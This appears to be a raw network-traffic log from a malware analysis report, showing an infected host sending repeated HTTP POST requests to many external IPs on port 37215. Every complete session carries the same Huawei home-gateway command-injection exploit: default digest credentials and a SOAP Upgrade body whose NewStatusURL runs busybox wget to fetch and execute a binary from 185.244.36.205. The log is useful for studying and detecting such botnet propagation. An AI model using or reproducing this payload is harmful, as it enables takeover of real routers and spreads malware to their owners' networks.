                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2350192.168.2.1536092190.23.43.22737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469465971 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2351192.168.2.155304241.104.84.16137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469480038 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2352192.168.2.1540004222.246.195.16037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469495058 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2353192.168.2.153945894.11.43.4937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469629049 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2354192.168.2.1533476186.129.84.20037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469641924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2355192.168.2.1545466181.56.73.22237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469666958 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2356192.168.2.1553996138.123.128.17637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469679117 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2357192.168.2.1548804156.6.158.1837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469687939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2358192.168.2.1537390138.88.249.9137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469700098 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2359192.168.2.1559226181.110.198.3437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469724894 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2360192.168.2.1548474186.95.10.18837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469746113 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
